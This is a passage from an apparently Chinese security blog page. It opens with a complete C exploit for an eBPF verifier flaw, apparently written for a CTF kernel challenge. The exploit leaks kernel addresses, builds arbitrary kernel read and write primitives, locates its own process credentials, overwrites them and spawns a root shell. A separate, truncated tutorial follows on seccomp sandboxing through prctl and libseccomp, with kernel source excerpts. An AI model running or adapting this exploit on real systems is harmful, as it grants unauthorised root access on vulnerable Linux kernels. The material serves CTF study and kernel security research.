bpf_map_update_elem(int map_fd,const void *key,const void *value,uint64_t flags)
{
    union bpf_attr attr;

    /* Clear every byte: the kernel rejects non-zero unused attr bytes. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t) (uintptr_t) key;
    attr.value = (uint64_t) (uintptr_t) value;
    attr.flags = flags;

    return bpf(BPF_MAP_UPDATE_ELEM, &attr);
}

/*
 * Delete the element stored under *key from map_fd (BPF_MAP_DELETE_ELEM).
 * Returns the bpf() result.
 */
static __always_inline int
bpf_map_delete_elem(int map_fd, const void *key)
{
    union bpf_attr attr;

    /* Clear every byte: the kernel rejects non-zero unused attr bytes. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t) (uintptr_t) key;

    return bpf(BPF_MAP_DELETE_ELEM, &attr);
}

/*
 * Fetch the key following *key in map_fd (BPF_MAP_GET_NEXT_KEY).
 * Despite its name, the `value` parameter is the output buffer for the next
 * key: it is passed in the attr's next_key field. Returns the bpf() result.
 */
static __always_inline int
bpf_map_get_next_key(int map_fd, const void *key, void *value)
{
    union bpf_attr attr;

    /* Clear every byte: the kernel rejects non-zero unused attr bytes. */
    memset(&attr, 0, sizeof(attr));
    attr.map_fd = map_fd;
    attr.key = (uint64_t) (uintptr_t) key;
    attr.next_key = (uint64_t) (uintptr_t) value;

    return bpf(BPF_MAP_GET_NEXT_KEY, &attr);
}

#define BPF_LOG_BUF_SZ 0x100000
static char bpf_log_buf[BPF_LOG_BUF_SZ] = { '\0' };

/**
 * @brief Run a bpf prog by attaching it to one end of a socket pair and
 *        sending a packet through the other end.
 *
 * The program is loaded as BPF_PROG_TYPE_SOCKET_FILTER. The verifier log is
 * written to the file-scope bpf_log_buf, which is cleared on every call.
 *
 * @param insns bpf program to be run
 * @param insn_cnt number of bpf instructions
 * @param log_level verifier log level passed to the loader
 * @param print_log non-zero to print the verifier log after a successful run
 * @return int 0 for success, negative for failure (socket pair creation,
 *         program load, attach, or sending the trigger packet)
 */
static int
run_bpf_prog(struct bpf_insn *insns, uint64_t insn_cnt, unsigned int log_level,
             unsigned int print_log)
{
    const char *err_msg = NULL;
    int sock_fd[2], prog_fd;
    int ret;

    /* socket pair to trigger eBPF prog */
    ret = socketpair(AF_UNIX, SOCK_DGRAM, 0, sock_fd);
    if (ret < 0) {
        err_msg = "FAILED to creat socket pair!";
        goto err_socket;
    }

    memset(bpf_log_buf, 0, sizeof(bpf_log_buf));

    /* load bpf prog into kernel */
    prog_fd = bpf_load_prog(BPF_PROG_TYPE_SOCKET_FILTER, insns, insn_cnt,
                            bpf_log_buf, BPF_LOG_BUF_SZ, log_level);
    if (prog_fd < 0) {
        ret = prog_fd;
        err_msg = "FAILED to load bpf program!";
        goto err_bpf_load;
    }

    /* attach bpf prog to a socket */
    ret = setsockopt(sock_fd[0], SOL_SOCKET, SO_ATTACH_BPF,
                     &prog_fd, sizeof(int));
    if (ret < 0) {
        err_msg = "FAILED to attach the bpf program!";
        goto err_bpf_attach;
    }

    /*
     * Send a packet to trigger bpf. A failed write means the filter never
     * ran, so report it instead of silently returning success.
     */
    if (write(sock_fd[1], "11111111", 8) < 0) {
        ret = -1;
        err_msg = "FAILED to send the trigger packet!";
        goto err_bpf_attach;
    }

    /* output the log */
    if (print_log != 0) {
        puts(bpf_log_buf);
    }

    /* recycle resource */
    close(prog_fd);
    close(sock_fd[1]);
    close(sock_fd[0]);

    return 0;

err_bpf_attach:
    close(prog_fd);
err_bpf_load:
    /* the verifier log is the most useful diagnostic on failure */
    puts(bpf_log_buf);
    close(sock_fd[1]);
    close(sock_fd[0]);
err_socket:
    err_print(err_msg);
    return ret;
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"
#include "bpf_tools.h"

#define MAP_SIZE 0x2000

#define ARRAY_MAP_OPS 0xffffffff822363e0
#define ARRAY_MAP_GET_NEXT_KEY 0xffffffff81239c80
#define INIT_TASK 0xffffffff82e1b400
#define INIT_CRED 0xffffffff82e88f20

#define VULN_REG BPF_REG_6
#define BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, __dst_reg) \
/* get a pointer to bpf_array */ \
BPF_LD_MAP_FD(BPF_REG_9, __map_fd), \
BPF_MOV64_REG(BPF_REG_1, BPF_REG_9), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -8), \
BPF_ST_MEM(BPF_DW, BPF_REG_2, 0, __idx), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* if success, r0 will be ptr to value, 0 for failed */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* mov the result back and clear R0 */ \
BPF_MOV64_REG(__dst_reg, BPF_REG_0), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define TRIGGER_VULN(__map_fd) \
/* load value into r2, make it part-unknown */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, VULN_REG, BPF_REG_8, 0), \
BPF_MOV64_IMM(BPF_REG_4, 0xffffffff), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_4, 32), \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_4), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
/* r3 = 0x100000002 */ \
BPF_MOV64_IMM(BPF_REG_3, 0x1), \
BPF_ALU64_IMM(BPF_LSH, BPF_REG_3, 32), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_3, 0x2), \
/* triger the vulnerability */ \
BPF_ALU64_REG(BPF_AND, VULN_REG, BPF_REG_3)

#define MAKE_VULN_REG(__map_fd) \
/* load value into r3, make it [0, 1] under 32 bit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0), \
BPF_JMP32_IMM(BPF_JLE, BPF_REG_7, 1, 2), \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_EXIT_INSN(), \
BPF_ALU64_REG(BPF_ADD, VULN_REG, BPF_REG_7), \
BPF_ALU64_IMM(BPF_ADD, VULN_REG, 0x1), \
BPF_ALU64_IMM(BPF_AND, VULN_REG, 0x1), \
BPF_MOV64_IMM(BPF_REG_0, 0)

#define LEAK_MAP_OPS(__map_fd) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x110), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_LDX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_7), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_8, 0)

#define LEAK_MAP_ADDR(__map_fd) \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV32_REG(VULN_REG, VULN_REG), \
BPF_ALU64_REG(BPF_ADD, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(1, __map_fd, BPF_REG_8), \
BPF_STX_MEM(BPF_DW, BPF_REG_8, BPF_REG_7, 0)

#define READ_ARBITRARY_ADDR(__map_fd, __idx) \
/* extend the alu->limit and do the oob read */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xd0), \
/* write the value into bpf_map->btf */ \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(__idx, __map_fd, BPF_REG_8), \
BPF_LDX_MEM(BPF_DW, BPF_REG_1, BPF_REG_8, 0), \
BPF_ALU64_IMM(BPF_SUB, BPF_REG_1, 0x58), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_1, 0)

#define MAKE_ARBITRARY_WRITE_OPS(__map_fd) \
/* extend the alu_limit */ \
BPF_READ_ARRAY_MAP_IDX(0, __map_fd, BPF_REG_7), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_7, 0x1000), \
BPF_ALU64_IMM(BPF_MUL, BPF_REG_8, 0x1000), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, BPF_REG_8), \
BPF_MOV64_REG(BPF_REG_8, VULN_REG), \
/* overwrite spin_lock_off */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xE4), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0x2000), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite max_entries */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x8), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 0xffffffff), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite map_type */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0xC), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_MOV64_IMM(BPF_REG_5, 23), \
BPF_STX_MEM(BPF_W, BPF_REG_7, BPF_REG_5, 0), \
/* overwrite the map->ops */ \
BPF_MOV64_REG(VULN_REG, BPF_REG_8), \
BPF_ALU64_IMM(BPF_MUL, VULN_REG, 0x18), \
BPF_ALU64_REG(BPF_SUB, BPF_REG_7, VULN_REG), \
BPF_READ_ARRAY_MAP_IDX(2, __map_fd, BPF_REG_4), \
BPF_LDX_MEM(BPF_DW, BPF_REG_5, BPF_REG_4, 0), \
BPF_STX_MEM(BPF_DW, BPF_REG_7, BPF_REG_5, 0)

size_t fake_ops_addr;
size_t map_addr;
size_t map_ops_addr;
size_t current_task;
size_t current_cred;

/*
 * Obtain one 32-bit value via the map-info query.
 *
 * Runs a program built from TRIGGER_VULN, MAKE_VULN_REG and
 * READ_ARBITRARY_ADDR(map_fd, idx), then issues BPF_OBJ_GET_INFO_BY_FD on
 * map_fd and returns the btf_id field of the returned bpf_map_info.
 *
 * map_fd: map used by the program and queried afterwards.
 * idx:    map slot handed to READ_ARBITRARY_ADDR; that macro loads the first
 *         8 bytes of the slot and subtracts 0x58 before storing the result.
 * Returns 0 when the program run or the info query fails, so a failure is
 * indistinguishable from a genuine zero value.
 * NOTE(review): 0x58 is presumably the offset of the id field inside the
 * kernel's struct btf for this build - confirm.
 */
static size_t read_arbitrary_addr_4_bytes(int map_fd, int idx){
size_t data;
int ret;
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
READ_ARBITRARY_ADDR(map_fd, idx),
BPF_EXIT_INSN()};

ret = run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
if (ret < 0){
return 0;
}

struct bpf_map_info info;
union bpf_attr attr = {
.info.bpf_fd = map_fd,
.info.info_len = sizeof(info),
.info.info = (uint64_t)&info,
};

/* clear the output struct so fields the kernel does not fill read as 0 */
memset(&info, 0, sizeof(info));
ret = bpf(BPF_OBJ_GET_INFO_BY_FD, &attr);
if (ret < 0){
return 0;
}
/* btf_id is a 32-bit field; it is widened to size_t here */
data = info.btf_id;
return data;
}

/*
 * Assemble a 64-bit value from two 32-bit reads.
 *
 * Stores addr in map slot 1 and addr + 4 in map slot 2, then calls
 * read_arbitrary_addr_4_bytes() for slot 2 (upper half) and slot 1 (lower
 * half) and combines the results.
 *
 * Exits through err_exit() if a map update fails.
 * NOTE(review): only value[0] is initialised; the remaining bytes of the
 * buffer handed to bpf_map_update_elem() are indeterminate stack contents.
 * NOTE(review): a failed 4-byte read returns 0 and is silently folded into
 * the result.
 */
size_t read_arbitrary_addr(int map_fd, size_t addr)
{
size_t data;
int key;
size_t value[0x1000];

key = 1;
value[0] = addr;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
key = 2;
value[0] = addr + 4;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0){
err_exit("FAILED to load value into map!");
}
/* upper 32 bits come from slot 2 (addr + 4), lower 32 bits from slot 1 */
data = read_arbitrary_addr_4_bytes(map_fd, 2);
data <<= 32;
data += read_arbitrary_addr_4_bytes(map_fd, 1);
return data;
}

/*
 * Build a modified copy of the map operations table inside the map and run
 * the program that repoints the map at it.
 *
 * Steps visible here:
 *  1. fake_ops_addr = map_addr + 0x110 + MAP_SIZE.
 *  2. Read sizeof(struct bpf_map_ops) bytes, 8 at a time, starting at
 *     map_ops_addr via read_arbitrary_addr() into value[].
 *  3. Replace the map_push_elem entry of that copy with
 *     ARRAY_MAP_GET_NEXT_KEY + kernel_offset.
 *  4. Store the copy in map slot 1 and fake_ops_addr in map slot 2.
 *  5. Run TRIGGER_VULN + MAKE_VULN_REG + MAKE_ARBITRARY_WRITE_OPS.
 *
 * Uses the file-scope map_addr and map_ops_addr, which must already be set.
 * NOTE(review): kernel_offset and err_exit() are not defined in this file;
 * presumably they come from kernelpwn.h - confirm.
 * NOTE(review): map_addr + 0x110 + MAP_SIZE presumably is the address of
 * map slot 1's value (0x110 = offset of the value area) - confirm.
 * NOTE(review): both error messages say "look up" although the failing call
 * is an update, and the result of run_bpf_prog() is not checked.
 */
void make_arbitrary_write_ops(int map_fd){
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
MAKE_ARBITRARY_WRITE_OPS(map_fd),
BPF_EXIT_INSN()};
int key;
size_t per_ops_ptr, value[0x1000], value_idx;
struct bpf_map_ops *ops_data;

fake_ops_addr = map_addr + 0x110 + MAP_SIZE; /* save fake ops addr into map */

value_idx = 0; /* read ops */
for (size_t i = 0; i < sizeof(struct bpf_map_ops); i += 8){
per_ops_ptr = read_arbitrary_addr(map_fd, map_ops_addr + i);
value[value_idx++] = per_ops_ptr;
}

ops_data = (struct bpf_map_ops *)value; /* load ops */
ops_data->map_push_elem = (void *)(ARRAY_MAP_GET_NEXT_KEY + kernel_offset);
key = 1;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

key = 2;
value[0] = fake_ops_addr;
if (bpf_map_update_elem(map_fd, &key, &value[0], 0) < 0){
err_exit("FAILED to look up value!");
}

run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 0);
}

/*
 * Hex-dump `size` bytes starting at p, one pointer-sized word per row.
 *
 * Each row shows the byte offset, the eight bytes in memory order and the
 * same bytes read as a native unsigned long.
 *
 * p:    buffer to dump (not modified)
 * size: number of bytes; must be a multiple of sizeof(void *)
 * Returns 0 on success, 1 (printing nothing) if size is not a multiple of
 * sizeof(void *).
 * NOTE: the row format reads 8 bytes per word, i.e. it assumes 64-bit
 * pointers and a 64-bit unsigned long.
 */
int print_hex(void *p, int size){
    const unsigned char *buf = (const unsigned char *)p;
    int i;

    if(size % sizeof(void *)){
        return 1;
    }
    printf("--------------------------------------------------------------------------------\n");
    for (i = 0; i < size; i += sizeof(void *)){
        unsigned long word;

        /*
         * Copy the word out instead of dereferencing a casted pointer:
         * that avoids the strict-aliasing violation and any misaligned
         * access when p is not unsigned-long aligned.
         */
        memcpy(&word, &buf[i], sizeof(word));
        printf("0x%04x : %02X %02X %02X %02X %02X %02X %02X %02X 0x%lx\n",
               (unsigned int)i, buf[i+0], buf[i+1], buf[i+2], buf[i+3],
               buf[i+4], buf[i+5], buf[i+6], buf[i+7], word);
    }
    return 0;
}

/*
 * Program entry point for the challenge reproduction.
 *
 * Sequence visible in the code:
 *  1. Create an array map (4-byte key, MAP_SIZE-byte value, 0x100 entries)
 *     and store 0 in slot 0.
 *  2. Run TRIGGER_VULN + MAKE_VULN_REG + LEAK_MAP_OPS, read slot 1 and take
 *     its first word as map_ops_addr; derive kernel_offset from
 *     ARRAY_MAP_OPS.
 *  3. Run TRIGGER_VULN + LEAK_MAP_ADDR, read slot 1 and subtract 0x110 to
 *     get map_addr.
 *  4. Set the process name to "11111111" and follow a linked list starting
 *     at INIT_TASK + kernel_offset + 0x818 until the 8 bytes at
 *     next_task + 0x2d0 equal that name.
 *  5. Read current_cred from current_task + 0xad8.
 *  6. Call make_arbitrary_write_ops(), then issue eight
 *     bpf_map_update_elem() calls whose flags argument is
 *     current_cred + 4 + 4 * i and whose value is -1.
 *  7. Call get_root_shell().
 *
 * NOTE(review): kernel_offset, kernel_base, init_cred, err_exit() and
 * get_root_shell() are not defined in this file; presumably they come from
 * kernelpwn.h - confirm.
 * NOTE(review): 0x818, 0x2d0 and 0xad8 are presumably task_struct member
 * offsets for this specific kernel build - confirm.
 * NOTE(review): argc, argv, envp and log_fd are unused; map_ops_addr is
 * printed twice; the do/while walk has no termination bound.
 */
int main(int argc , char **argv, char **envp)
{
int map_fd;
int key;
size_t value[0x1000];
int log_fd;

map_fd = bpf_map_create(BPF_MAP_TYPE_ARRAY, 4, MAP_SIZE, 0x100);
if (map_fd < 0) {
err_exit("FAILED to create eBPF map!");
}

/* slot 0 holds the input value the programs load at run time */
key = 0;
value[0] = 0;
if (bpf_map_update_elem(map_fd, &key, &value, 0) < 0) {
err_exit("FAILED to load value into map!");
}

puts("leak map_ops_addr");
struct bpf_insn prog[] = {
TRIGGER_VULN(map_fd),
MAKE_VULN_REG(map_fd),
LEAK_MAP_OPS(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog, sizeof(prog) / sizeof(prog[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

/* the program stored its result in slot 1 */
key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
map_ops_addr = value[0];
printf("map_ops_addr: 0x%lx\n", map_ops_addr);

/* difference between the leaked address and the static one */
kernel_offset = map_ops_addr - ARRAY_MAP_OPS;
kernel_base += kernel_offset;
init_cred = INIT_CRED + kernel_offset;
printf("map_ops_addr: 0x%lx\n", map_ops_addr);
printf("kernel_base: 0x%lx\n", kernel_base);
printf("kernel_offset: 0x%lx\n", kernel_offset);

puts("leak map_addr");
struct bpf_insn prog2[] = {
TRIGGER_VULN(map_fd),
LEAK_MAP_ADDR(map_fd),
BPF_EXIT_INSN()
};
if(run_bpf_prog(prog2, sizeof(prog2) / sizeof(prog2[0]), 1, 1) < 0){
err_exit("FAILED to run bpf prog!");
};

key = 1;
if (bpf_map_lookup_elem(map_fd, &key, &value) < 0){
err_exit("FAILED to look up value!");
}
print_hex(value,0x10);
/* the leaked pointer is 0x110 bytes past the start of the map object */
map_addr = value[0] - 0x110;
printf("map_addr: 0x%lx\n", map_addr);

size_t next_task = INIT_TASK + kernel_offset + 0x818;
size_t data;

/* tag this process with a recognisable name, then search for it */
prctl(PR_SET_NAME, "11111111");
do{
next_task = read_arbitrary_addr(map_fd, next_task);
data = read_arbitrary_addr(map_fd, next_task + 0x2d0);
} while (data != *(size_t *)"11111111");

/* next_task points 0x818 bytes into the matching structure */
current_task = next_task - 0x818;
current_cred = read_arbitrary_addr(map_fd, current_task + 0xad8);
printf("current_task: 0x%lx\n", current_task);
printf("current_cred: 0x%lx\n", current_cred);

make_arbitrary_write_ops(map_fd);

/* eight consecutive 4-byte targets starting at current_cred + 4 */
key = 0;
value[0] = -1;
for (int i = 0; i < 8; i++){
if (bpf_map_update_elem(map_fd, &key, &value[0], current_cred + 4 + 4 * i) < 0){
printf("\033[31m\033[1m[x] Failed to ovwerwrite no.%d\033[0m\n", i);
err_exit("FAILED to call ops->map_push_elem()!");
}
}
get_root_shell();

return 0;
}

沙盒基础知识

在 CTF 的 pwn 题中一般有两种函数调用方式实现沙盒机制:

使用 prctl 系统调用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
#include<stdio.h>
#include<fcntl.h>
#include<unistd.h>
#include<stddef.h>
#include<linux/seccomp.h>
#include<linux/filter.h>
#include<sys/prctl.h>
#include<linux/bpf.h>
#include<sys/types.h>

/*
 * Demo: install a seccomp filter through prctl() and then attempt execve.
 *
 * The filter loads the syscall number and returns SECCOMP_RET_ERRNO for
 * syscall 59 (execve) and SECCOMP_RET_ALLOW for everything else.
 * Returns 1 if either prctl() call fails, so the execve attempt is never
 * made without the filter in place; otherwise returns 0.
 */
int main(void){
    struct sock_filter filter[]={
        /* A = seccomp_data.nr (offset 0: the syscall number) */
        BPF_STMT(BPF_LD|BPF_W|BPF_ABS, offsetof(struct seccomp_data, nr)),
        /* execve -> jump to the ERRNO return */
        BPF_JUMP(BPF_JMP|BPF_JEQ, 59, 1, 0),
        /* any other number (A >= 0 is always true) -> jump to ALLOW */
        BPF_JUMP(BPF_JMP|BPF_JGE, 0, 1, 0),
        BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ERRNO),
        BPF_STMT(BPF_RET+BPF_K,SECCOMP_RET_ALLOW),
    };
    struct sock_fprog prog={
        .len=sizeof(filter)/sizeof(filter[0]),
        .filter=filter,
    };

    if (prctl(PR_SET_NO_NEW_PRIVS,1,0,0,0) < 0) {
        perror("prctl(PR_SET_NO_NEW_PRIVS)");
        return 1;
    }
    if (prctl(PR_SET_SECCOMP,SECCOMP_MODE_FILTER,&prog) < 0) {
        perror("prctl(PR_SET_SECCOMP)");
        return 1;
    }
    /* with the filter active this call is answered by the filter */
    syscall(59,"/bin/sh",NULL,NULL);
    return 0;
}
1
2
3
4
5
0000: 0x20 0x00 0x00 0x00000000  A = sys_number
0001: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0003
0002: 0x35 0x01 0x00 0x00000000 if (A >= 0x0) goto 0004
0003: 0x06 0x00 0x00 0x00050000 return ERRNO(0)
0004: 0x06 0x00 0x00 0x7fff0000 return ALLOW

使用 seccomp 库函数:

1
2
3
4
5
6
7
8
9
10
11
12
#include <unistd.h>
#include <seccomp.h>
#include <linux/seccomp.h>

/*
 * Demo: use libseccomp to allow everything except execve (SCMP_ACT_KILL),
 * then attempt execve.
 *
 * Returns 1 if the filter context cannot be created, the rule cannot be
 * added, or the filter cannot be loaded, so the execve attempt is never made
 * without the filter in place; otherwise returns 0.
 */
int main(void){
    scmp_filter_ctx ctx;
    int rc;

    ctx = seccomp_init(SCMP_ACT_ALLOW);
    if (ctx == NULL) {
        return 1;
    }

    rc = seccomp_rule_add(ctx, SCMP_ACT_KILL, SCMP_SYS(execve), 0);
    if (rc == 0) {
        rc = seccomp_load(ctx);
    }
    /* the context is only needed to build and load the filter */
    seccomp_release(ctx);
    if (rc != 0) {
        return 1;
    }

    syscall(59,"/bin/sh",NULL,NULL);
    return 0;
}
1
2
3
4
5
6
7
8
0000: 0x20 0x00 0x00 0x00000004  A = arch
0001: 0x15 0x00 0x05 0xc000003e if (A != ARCH_X86_64) goto 0007
0002: 0x20 0x00 0x00 0x00000000 A = sys_number
0003: 0x35 0x00 0x01 0x40000000 if (A < 0x40000000) goto 0005
0004: 0x15 0x00 0x02 0xffffffff if (A != 0xffffffff) goto 0007
0005: 0x15 0x01 0x00 0x0000003b if (A == execve) goto 0007
0006: 0x06 0x00 0x00 0x7fff0000 return ALLOW
0007: 0x06 0x00 0x00 0x00000000 return KILL
  • 对 seccomp_load 函数进行逆向分析,可以发现其底层也是使用 prctl 系统调用
1
v17 = prctl(38LL, 1LL, 0LL, 0LL, 0LL); /* PR_SET_NO_NEW_PRIVS */
1
v14 = prctl(22LL, 2LL, v10, v10, v7); /* PR_SET_SECCOMP */

prctl 系统调用

prctl(process control,进程控制)是 Linux 提供的一个系统调用,它可以对调用进程(线程)自身进行各种管理和控制操作

prctl 提供了对进程的许多控制和设置,使用第一个参数来指定其功能:

  • 设置进程的权限级别
  • 设置进程的调度参数
  • 设置进程的内存限制
  • 设置进程的 CPU 时间限制
  • 设置进程的信号处理
  • 设置进程的资源限制
  • 设置进程的属性
  • 获取进程的属性

沙盒需要的 prctl 功能如下:

  • prctl(PR_SET_NO_NEW_PRIVS):为当前进程设置 no_new_privs 标志,此后 execve 不会再赋予该进程(及其子进程)新的权限;没有 CAP_SYS_ADMIN 权限的进程必须先设置该标志才能安装 seccomp 过滤器
  • prctl(PR_SET_SECCOMP):第二个参数是设置的过滤模式,第三个参数是设置的过滤规则
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
SYSCALL_DEFINE5(prctl, int, option, unsigned long, arg2, unsigned long, arg3,
unsigned long, arg4, unsigned long, arg5)
{
struct task_struct *me = current;
unsigned char comm[sizeof(me->comm)];
long error;

error = security_task_prctl(option, arg2, arg3, arg4, arg5);
if (error != -ENOSYS)
return error;

error = 0;
switch (option) {
......

case PR_SET_SECCOMP:
error = prctl_set_seccomp(arg2, (char __user *)arg3);
break;

......

case PR_SET_NO_NEW_PRIVS:
if (arg2 != 1 || arg3 || arg4 || arg5)
return -EINVAL;

task_set_no_new_privs(current);
break;

......

default:
error = -EINVAL;
break;
}
return error;
}

核心函数 prctl_set_seccomp 的调用链如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
/*
 * prctl(PR_SET_SECCOMP) back end: translate the prctl-style seccomp_mode
 * into a seccomp operation and forward it to do_seccomp() with flags == 0.
 * Returns -EINVAL for any mode other than STRICT or FILTER.
 */
long prctl_set_seccomp(unsigned long seccomp_mode, void __user *filter)
{
unsigned int op;
void __user *uargs;

switch (seccomp_mode) {
case SECCOMP_MODE_STRICT: /* strict mode: no filter argument is passed; per seccomp(2) only read, write, _exit and sigreturn stay allowed */
op = SECCOMP_SET_MODE_STRICT;
uargs = NULL;
break;
case SECCOMP_MODE_FILTER: /* filter mode: syscalls are allowed or rejected by the user-supplied filter */
op = SECCOMP_SET_MODE_FILTER;
uargs = filter;
break;
default:
return -EINVAL;
}

return do_seccomp(op, 0, uargs);
}
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
 * Common entry point for seccomp operations: dispatch on op to the matching
 * handler. Every operation except SECCOMP_SET_MODE_FILTER requires
 * flags == 0; unknown operations return -EINVAL.
 */
static long do_seccomp(unsigned int op, unsigned int flags,
void __user *uargs)
{
switch (op) {
case SECCOMP_SET_MODE_STRICT: /* strict mode: takes neither flags nor arguments */
if (flags != 0 || uargs != NULL)
return -EINVAL;
return seccomp_set_mode_strict();
case SECCOMP_SET_MODE_FILTER: /* filter mode: uargs is the user filter */
return seccomp_set_mode_filter(flags, uargs);
case SECCOMP_GET_ACTION_AVAIL: /* query whether a given action is supported by the kernel */
if (flags != 0)
return -EINVAL;

return seccomp_get_action_avail(uargs);
case SECCOMP_GET_NOTIF_SIZES: /* per seccomp(2): report the sizes of the seccomp user-notification structures */
if (flags != 0)
return -EINVAL;

return seccomp_get_notif_sizes(uargs);
default:
return -EINVAL;
}
}

这里我们重点分析过滤模式的 seccomp_set_mode_filter 函数:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
/*
